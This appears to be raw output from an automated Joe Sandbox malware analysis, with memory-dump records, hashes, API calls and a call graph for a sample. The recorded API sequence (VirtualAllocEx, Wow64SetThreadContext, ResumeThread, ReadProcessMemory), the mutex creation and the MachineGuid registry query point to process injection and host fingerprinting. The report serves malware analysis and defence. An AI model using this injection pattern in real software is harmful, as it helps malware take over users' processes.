                                      • Source File: 00000008.00000002.2128975061.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_b40000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: a697d4ca3516ec6cf25eb4cf3f1027d2f0459bbc767e371dafcc926472d119ba
                                      • Instruction ID: e96eaf38d7f1b47a5cfb51248a4b304506b4dde4082b595ca0b1ff51e8e2c995
                                      • Opcode Fuzzy Hash: a697d4ca3516ec6cf25eb4cf3f1027d2f0459bbc767e371dafcc926472d119ba
                                      • Instruction Fuzzy Hash: 4C21E6B59002089FDB10CF9AD584ADEBBF4FB48320F14845AE914B3351D378A950CFA4
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 081079E8
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 0a84738ed554233a59ada3c9054b259e156ea35eda1e8f91fdc564613d130101
                                      • Instruction ID: 9986461e2637cf708d4b15b6dc92b226ce6103ec16eaf08c5facbba5a4163ff8
                                      • Opcode Fuzzy Hash: 0a84738ed554233a59ada3c9054b259e156ea35eda1e8f91fdc564613d130101
                                      • Instruction Fuzzy Hash: C121F8B18002499FCB10DFAAC945AEEBBF5FF48320F50842AE519A7250D779A954CBA0
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0810775E
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: a0a024fb2bb2d692e706ef70b4316762de2abb1b8bf7d0fdf2ea79503d614f85
                                      • Instruction ID: f39da633cf27be1587275c43afd6de8c800f0ab2467f5fd5c5edcacd37105814
                                      • Opcode Fuzzy Hash: a0a024fb2bb2d692e706ef70b4316762de2abb1b8bf7d0fdf2ea79503d614f85
                                      • Instruction Fuzzy Hash: E5211AB19003098FDB10DFAEC9857AEBBF5EF48314F148429D519A7281D778A945CFA0
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08107826
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 6fbbf40640963f670fd64610bc049fb1fc74960f69d7af19416a0804085d3ec8
                                      • Instruction ID: 96135f0162805aab24912ef595a5439a843d3e1835f83324e95393255adc73a3
                                      • Opcode Fuzzy Hash: 6fbbf40640963f670fd64610bc049fb1fc74960f69d7af19416a0804085d3ec8
                                      • Instruction Fuzzy Hash: 05112C719002499FCF10DFAAD844AEEBFF5EF48320F14841AE515A7250C7759554DFA0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 4974a9baec906e6c73334cb49d222376b112309d7dd2e91962b6a828bbca4e65
                                      • Instruction ID: 5a595f11cf10fc3ca006b9d138ad5852312d42bc0ad6f5e544602e32736dcc87
                                      • Opcode Fuzzy Hash: 4974a9baec906e6c73334cb49d222376b112309d7dd2e91962b6a828bbca4e65
                                      • Instruction Fuzzy Hash: D21137B18002498EDB10DFAED8457AEBBF5EF48320F148819D519A7250CB79A944CFA4
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08107826
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: e8835de8f48007070914ddbbf474852a6a178f9305c976644d224ca331f857bd
                                      • Instruction ID: 5f7cd21168dfb15cbaab241163cba2f4a1bb26e9692da7f3dade93a112c2dab6
                                      • Opcode Fuzzy Hash: e8835de8f48007070914ddbbf474852a6a178f9305c976644d224ca331f857bd
                                      • Instruction Fuzzy Hash: 4B1149718002499FCB10DFAAD844BEFBFF5EF48320F10881AE519A7290C779A950CFA0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 3d5323c95edfd7e50be3ce238e10af3a31c4d5c5fa48472deb94911e22fa6f76
                                      • Instruction ID: 97c5f5011ecdca68b8eba94f5004162b0556263d1451b7d14f5802ace317763e
                                      • Opcode Fuzzy Hash: 3d5323c95edfd7e50be3ce238e10af3a31c4d5c5fa48472deb94911e22fa6f76
                                      • Instruction Fuzzy Hash: 2B1128B1D002498FDB10DFAED8457AEFBF5EF88320F108819D519A7290CB79A944CFA4
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00B4B07E
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128975061.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_b40000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: b2e8b6773507cdf7231c77eae61141d4b8ec0bac9ed43eca3cc884de126d2819
                                      • Instruction ID: 55a855e60d0e26e9cefe3805f6050fce604063d03f7512b2506b91c1ccc212cb
                                      • Opcode Fuzzy Hash: b2e8b6773507cdf7231c77eae61141d4b8ec0bac9ed43eca3cc884de126d2819
                                      • Instruction Fuzzy Hash: 1811DFB6C002498FCB20DFAAD444B9EFBF4EB88314F10845AD529A7350D379A645CFA1
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0810AC55
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: 05fcc4fa33ad85f3a25bda16b39a0276552185ab278ce83e7494317dc8a767bc
                                      • Instruction ID: 2a5336676104b7ba51f8a64c9278229e2ad17a447cf41ca4eb34ed3842b73d4b
                                      • Opcode Fuzzy Hash: 05fcc4fa33ad85f3a25bda16b39a0276552185ab278ce83e7494317dc8a767bc
                                      • Instruction Fuzzy Hash: 9511F5B58003499FDB10DF9AC944BDEBBF8EF48310F108419E558A7240C375A984CFA5
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0810AC55
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: be51e8d4e9e396c411c649375c3e7220d8a42a28eec7fe34620ea9845d508026
                                      • Instruction ID: 3ee1056ed1de5ad5d22fb0bd82a7a1f7533a6111d78a75ac951bf3ea75f66fd5
                                      • Opcode Fuzzy Hash: be51e8d4e9e396c411c649375c3e7220d8a42a28eec7fe34620ea9845d508026
                                      • Instruction Fuzzy Hash: 0B11D3B58003499FDB10DF9AD985BDEBBF8FF48314F10841AE558A7250C379A984CFA5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128168947.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_add000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a96e206dfdfe44b44f34224f29022359785f466d984ca0ce4753ebaa2bc24756
                                      • Instruction ID: 89f1c9f773f824fb727365406d6684416dc7cb41250c64b83e48555c4e508cb2
                                      • Opcode Fuzzy Hash: a96e206dfdfe44b44f34224f29022359785f466d984ca0ce4753ebaa2bc24756
                                      • Instruction Fuzzy Hash: 3C2125B1540240EFCB15DF14E9C0F26BF65FB98318F20C56AE90A0B356C33AD816DBA2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128168947.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_add000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c086e7a91c990e5c4d725428124fbaa94825de51c560710333081f926522e5a
                                      • Instruction ID: a87d3e467389f9ddfc472714f68dc6a3221d03beac303b70c5298a88499ce1bf
                                      • Opcode Fuzzy Hash: 0c086e7a91c990e5c4d725428124fbaa94825de51c560710333081f926522e5a
                                      • Instruction Fuzzy Hash: C62128B1500204DFDB15DF14D9C0F26BF65FB98324F20C56AD90A0B356C33AE856D7A2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128356843.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_afd000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bcca7fe489fcbdc66245249c8778f88b18e5e3c297868633c5918c0ce5471f2b
                                      • Instruction ID: fbb4ece8f873ec8b8ad0a2ad2848689d64909036d96f8a747d05067841c0a48a
                                      • Opcode Fuzzy Hash: bcca7fe489fcbdc66245249c8778f88b18e5e3c297868633c5918c0ce5471f2b
                                      • Instruction Fuzzy Hash: 0821F571504208DFDB16DF64D584B26BF66FB84314F20C569EA4A4B356CB3AD807CA61
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128356843.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_afd000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb72f0cc2546d528384fc04b76b2791397e44d1d1286ab858baf41837cdf5435
                                      • Instruction ID: dde1be306138402fc974b33f4f13e9653e83a9b44171a5251548816ba78306d1
                                      • Opcode Fuzzy Hash: fb72f0cc2546d528384fc04b76b2791397e44d1d1286ab858baf41837cdf5435
                                      • Instruction Fuzzy Hash: 00210771504208EFDB06DF94D5C0F36BB66FB84314F20C56DEA094B256C33AD806DAA1
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128356843.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_afd000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f23b7a0c920e4d4bac6c281eecb183f18926601615de5883e790be2dbea25b79
                                      • Instruction ID: b04aefa1666cb7ed3193413b62df023798e7497404d10c178fce7972c7d2655d
                                      • Opcode Fuzzy Hash: f23b7a0c920e4d4bac6c281eecb183f18926601615de5883e790be2dbea25b79
                                      • Instruction Fuzzy Hash: 5E2180755093848FCB03CF24D994715BF72EB46314F28C5EAD9498B6A7C33A980ACB62
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128168947.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_add000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                      • Instruction ID: 59d8ea48935b4c508cdf81c57289fb704efb57789b39b6e1ebb4a2e951b22936
                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                      • Instruction Fuzzy Hash: A511E676504280DFCB16CF14D5C4B16BF71FB98314F24C6AAD94A0B756C336D85ACBA2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128168947.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_add000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                      • Instruction ID: 7bd7197abad08d47a08a7d2de32f7cff2893cfac128d8aa872274bb3702f1010
                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                      • Instruction Fuzzy Hash: 431126B2404240DFCB12CF00D5C4B16BF71FB94324F24C6AAD90A0B356C33AE85ACBA2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128356843.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_afd000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                      • Instruction ID: 3fe7a7da3a617e116619e13f9e1df58add717d0397b9e64f9960318ab5dca680
                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                      • Instruction Fuzzy Hash: 1A11BB75504284DFCB02CF50C5C4B25BBA2FB84314F24C6AAE9494B296C33AD80ACBA2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128168947.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_add000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98c939eb243d02b68bbb0cfca830282414c91502363cc3ab63b7a0cbceefbdb2
                                      • Instruction ID: 2a32ade46e556b8036ce66b6a2420a19eeae96d3778ce6b610acb464648cf7c9
                                      • Opcode Fuzzy Hash: 98c939eb243d02b68bbb0cfca830282414c91502363cc3ab63b7a0cbceefbdb2
                                      • Instruction Fuzzy Hash: 840126310043409AE7208F29CD84B67BFECEF56320F18C5ABED1A0E386C2399C00CAB1
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2128168947.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_add000_ZeJFfrYmOnJKS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 66298ee4142a61e9503a7216da20b8afc84e7682d7c53abb87d5a83f926de5e9
                                      • Instruction ID: 0f2ba95f120c402bc5c9a3a52fa7bfb3b908c05b05b852ef01a4750ae271980c
                                      • Opcode Fuzzy Hash: 66298ee4142a61e9503a7216da20b8afc84e7682d7c53abb87d5a83f926de5e9
                                      • Instruction Fuzzy Hash: 2EF062724043449AE7208F16CC88B62FFD8EF56734F18C45AED494E386C2799C44CAB1

                                      Execution Graph

                                      Execution Coverage:3%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:1.3%
                                      Total number of Nodes:302
                                      Total number of Limit Nodes:13
                                      execution_graph 8943 408952 8964 40823f 8943->8964 8946 408960 8948 4056bf 2 API calls 8946->8948 8949 40896a 8948->8949 8992 408862 8949->8992 8951 4089c4 8952 413aca 4 API calls 8951->8952 8953 4089d4 8952->8953 8955 405695 2 API calls 8953->8955 8954 408975 8954->8951 9000 4087d6 8954->9000 8957 4089df 8955->8957 8962 402bab 2 API calls 8963 40899d 8962->8963 8963->8951 8963->8962 8965 40824d 8964->8965 8966 40831b 8965->8966 8967 4031e5 3 API calls 8965->8967 8966->8946 8980 4083bb 8966->8980 8968 40826d 8967->8968 8969 4031e5 3 API calls 8968->8969 8970 408289 8969->8970 8971 4031e5 3 API calls 8970->8971 8972 4082a5 8971->8972 8973 4031e5 3 API calls 8972->8973 8974 4082c1 8973->8974 8975 4031e5 3 API calls 8974->8975 8976 4082e2 8975->8976 8977 4031e5 3 API calls 8976->8977 8978 4082ff 8977->8978 8979 4031e5 3 API calls 8978->8979 8979->8966 9028 408363 8980->9028 8983 4084ab 8983->8946 8984 4056bf 2 API calls 8989 4083f4 8984->8989 8985 408492 8986 413aca 4 API calls 8985->8986 8987 4084a0 8986->8987 8988 405695 2 API calls 8987->8988 8988->8983 8989->8985 9031 40815d 8989->9031 9046 40805d 8989->9046 9061 404b8f 8992->9061 8994 40887e 8995 4031e5 3 API calls 8994->8995 8996 40893e 8994->8996 8998 408946 8994->8998 8999 402b7c 2 API calls 8994->8999 8995->8994 9064 404a39 8996->9064 8998->8954 8999->8994 9001 402b7c 2 API calls 9000->9001 9002 4087e7 9001->9002 9003 4031e5 3 API calls 9002->9003 9005 40885a 9002->9005 9007 408802 9003->9007 9004 402bab 2 API calls 9004->9005 9012 408749 9005->9012 9008 40884d 9007->9008 9011 408853 9007->9011 9073 408522 9007->9073 9077 4084b4 9007->9077 9080 4084d4 9008->9080 9011->9004 9013 404b8f 3 API calls 9012->9013 9014 408765 9013->9014 9015 4031e5 3 API calls 9014->9015 9016 408522 3 API calls 9014->9016 9017 4087c7 9014->9017 9019 4087cf 9014->9019 9015->9014 9016->9014 9018 404a39 4 API calls 9017->9018 9018->9019 9020 4085d1 9019->9020 9021 4086c2 9020->9021 9024 4085e9 9020->9024 9021->8963 9023 402bab 2 API calls 9023->9024 9024->9021 9024->9023 9025 4031e5 3 API calls 9024->9025 9086 4089e6 9024->9086 9105 4086c9 9024->9105 9109 4036a3 9024->9109 9025->9024 9029 4031e5 3 API calls 9028->9029 9030 408386 9029->9030 9030->8983 9030->8984 9032 40816f 9031->9032 9033 4081b6 9032->9033 9034 4081fd 9032->9034 9045 4081ef 9032->9045 9036 405872 4 API calls 9033->9036 9035 405872 4 API calls 9034->9035 9037 408213 9035->9037 9038 4081cf 9036->9038 9039 405872 4 API calls 9037->9039 9040 405872 4 API calls 9038->9040 9041 408222 9039->9041 9042 4081df 9040->9042 9043 405872 4 API calls 9041->9043 9044 405872 4 API calls 9042->9044 9043->9045 9044->9045 9045->8989 9047 40808c 9046->9047 9048 4080d2 9047->9048 9049 408119 9047->9049 9060 40810b 9047->9060 9050 405872 4 API calls 9048->9050 9051 405872 4 API calls 9049->9051 9052 4080eb 9050->9052 9053 40812f 9051->9053 9054 405872 4 API calls 9052->9054 9055 405872 4 API calls 9053->9055 9056 4080fb 9054->9056 9057 40813e 9055->9057 9058 405872 4 API calls 9056->9058 9059 405872 4 API calls 9057->9059 9058->9060 9059->9060 9060->8989 9067 404a19 9061->9067 9070 4049ff 9064->9070 9066 404a44 9066->8998 9068 4031e5 3 API calls 9067->9068 9069 404a2c 9068->9069 9069->8994 9071 4031e5 3 API calls 9070->9071 9072 404a12 RegCloseKey 9071->9072 9072->9066 9074 408534 9073->9074 9076 4085af 9074->9076 9083 4084ee 9074->9083 9076->9007 9078 4031e5 3 API calls 9077->9078 9079 4084c7 9078->9079 9079->9007 9081 4031e5 3 API calls 9080->9081 9082 4084e7 9081->9082 9082->9011 9084 4031e5 3 API calls 9083->9084 9085 408501 9084->9085 9085->9076 9087 4031e5 3 API calls 9086->9087 9088 408a06 9087->9088 9089 4031e5 3 API calls 9088->9089 9093 408b21 9088->9093 9092 408a32 9089->9092 9090 408b17 9121 403649 9090->9121 9092->9090 9112 403666 9092->9112 9093->9024 9096 408b0e 9118 40362f 9096->9118 9098 4031e5 3 API calls 9099 408a88 9098->9099 9099->9096 9100 4031e5 3 API calls 9099->9100 9101 408ac4 9100->9101 9102 405b6f 5 API calls 9101->9102 9103 408aff 9102->9103 9103->9096 9115 408508 9103->9115 9106 4086e2 9105->9106 9108 408744 9105->9108 9107 405872 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9106->9107 9106->9108 9107->9106 9108->9024 9110 4031e5 3 API calls 9109->9110 9111 4036b5 9110->9111 9111->9024 9113 4031e5 3 API calls 9112->9113 9114 403679 9113->9114 9114->9096 9114->9098 9116 4031e5 3 API calls 9115->9116 9117 40851b 9116->9117 9117->9096 9119 4031e5 3 API calls 9118->9119 9120 403642 9119->9120 9120->9090 9122 4031e5 3 API calls 9121->9122 9123 40365c 9122->9123 9123->9093 8101 402c1f 8102 4031e5 3 API calls 8101->8102 8103 402c31 LoadLibraryW 8102->8103 8060 405924 8063 4031e5 8060->8063 8064 4031f3 8063->8064 8065 403236 8063->8065 8064->8065 8067 403208 8064->8067 8074 4030a5 8065->8074 8080 403263 8067->8080 8069 4031e5 3 API calls 8071 403258 8069->8071 8070 40320d 8070->8071 8072 4030a5 3 API calls 8070->8072 8073 403224 8072->8073 8073->8069 8073->8071 8086 402ca4 8074->8086 8076 4030b0 8077 4030b5 8076->8077 8090 4030c4 8076->8090 8077->8073 8081 40326d 8080->8081 8085 4032b7 8081->8085 8099 402b7c GetProcessHeap HeapAlloc 8081->8099 8083 40328c 8084 402b7c 2 API calls 8083->8084 8084->8085 8085->8070 8087 403079 8086->8087 8089 40307c 8087->8089 8094 40317b GetPEB 8087->8094 8089->8076 8091 4030eb 8090->8091 8093 4030c0 8091->8093 8096 402c03 8091->8096 8093->8073 8095 40319b 8094->8095 8095->8089 8097 4031e5 3 API calls 8096->8097 8098 402c15 8097->8098 8098->8093 8100 402b98 8099->8100 8100->8083 8104 4139de 8113 413855 8104->8113 8106 4139f1 8107 413838 GetProcessHeap HeapAlloc GetPEB 8106->8107 8110 4139f7 8107->8110 8108 413866 21 API calls 8109 413a2d 8108->8109 8111 413b81 GetProcessHeap HeapAlloc GetPEB ExitProcess 8109->8111 8110->8108 8112 413a34 8111->8112 8114 4031e5 3 API calls 8113->8114 8115 413864 8114->8115 8115->8115 8059 404df3 WSAStartup 10666 40f980 10681 413c87 10666->10681 10668 40fa19 10669 40fa08 10670 402bab 2 API calls 10669->10670 10670->10668 10671 40f993 10671->10668 10671->10669 10672 40429b 3 API calls 10671->10672 10673 40f9ca 10672->10673 10703 4060bd 10673->10703 10678 412093 6 API calls 10679 40f9f6 10678->10679 10680 412093 6 API calls 10679->10680 10680->10669 10721 413d97 10681->10721 10684 404056 5 API calls 10686 413cad 10684->10686 10685 413c9f 10685->10671 10686->10685 10687 405b6f 5 API calls 10686->10687 10689 413d10 10687->10689 10688 413d7b 10692 402bab 2 API calls 10688->10692 10689->10688 10690 403c62 3 API calls 10689->10690 10691 413d1f 10690->10691 10691->10688 10693 413d5a 10691->10693 10694 413d2c 10691->10694 10692->10685 10696 405b6f 5 API calls 10693->10696 10695 405dc5 3 API calls 10694->10695 10697 413d33 10695->10697 10698 413d55 10696->10698 10697->10698 10700 405b6f 5 API calls 10697->10700 10699 402bab 2 API calls 10698->10699 10699->10688 10701 413d48 10700->10701 10702 402bab 2 API calls 10701->10702 10702->10698 10704 4031e5 3 API calls 10703->10704 10705 4060dd 10704->10705 10706 406126 10705->10706 10707 4031e5 3 API calls 10705->10707 10706->10669 10710 40650a 10706->10710 10708 40610f 10707->10708 10784 40604f 10708->10784 10711 4060ac 3 API calls 10710->10711 10712 406519 10711->10712 10713 4031e5 3 API calls 10712->10713 10714 406529 10713->10714 10715 406599 10714->10715 10716 4031e5 3 API calls 10714->10716 10715->10678 10717 406544 10716->10717 10718 40657f 10717->10718 10720 4031e5 3 API calls 10717->10720 10719 403c40 3 API calls 10718->10719 10719->10715 10720->10718 10722 413da0 10721->10722 10725 413c96 10721->10725 10727 4065a2 10722->10727 10725->10684 10725->10685 10726 405dc5 3 API calls 10726->10725 10742 404a52 10727->10742 10729 406638 10729->10725 10729->10726 10730 4065c0 10730->10729 10754 40393f 10730->10754 10733 406631 10734 402bab 2 API calls 10733->10734 10734->10729 10735 4059d8 3 API calls 10736 4065e9 10735->10736 10738 402b7c 2 API calls 10736->10738 10741 40662a 10736->10741 10737 402bab 2 API calls 10737->10733 10739 4065f8 10738->10739 10740 402bab 2 API calls 10739->10740 10740->10741 10741->10737 10743 402b7c 2 API calls 10742->10743 10745 404a65 10743->10745 10744 404ac6 10744->10730 10745->10744 10746 4031e5 3 API calls 10745->10746 10747 404a8a RegOpenKeyExA 10746->10747 10748 404aa0 10747->10748 10749 404aca 10747->10749 10750 4031e5 3 API calls 10748->10750 10751 402bab 2 API calls 10749->10751 10752 404ab1 RegQueryValueExA 10750->10752 10751->10744 10753 404a39 4 API calls 10752->10753 10753->10744 10761 403843 10754->10761 10757 403969 10757->10733 10757->10735 10759 403961 10760 402bab 2 API calls 10759->10760 10760->10757 10762 403861 10761->10762 10763 402b7c 2 API calls 10762->10763 10765 403875 10763->10765 10764 403923 10764->10757 10780 403aef 10764->10780 10765->10764 10766 4031e5 3 API calls 10765->10766 10767 40389b 10766->10767 10767->10764 10768 4031e5 3 API calls 10767->10768 10769 4038c5 10768->10769 10770 40392a 10769->10770 10772 403666 3 API calls 10769->10772 10771 403649 3 API calls 10770->10771 10771->10764 10773 4038e7 10772->10773 10773->10770 10774 4031e5 3 API calls 10773->10774 10775 403901 10774->10775 10775->10770 10776 403911 10775->10776 10777 40362f 3 API calls 10776->10777 10778 403919 10777->10778 10779 403649 3 API calls 10778->10779 10779->10764 10781 403afc 10780->10781 10782 402b7c 2 API calls 10781->10782 10783 403b16 10782->10783 10783->10759 10785 4031e5 3 API calls 10784->10785 10786 406062 10785->10786 10786->10706

                                      Control-flow Graph

                                      APIs
                                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                      • GetLastError.KERNEL32 ref: 0041399E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Error$CreateLastModeMutex
                                      • String ID:
                                      • API String ID: 3448925889-0
                                      • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                      • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                        • Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                      • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                      Memory Dump Source
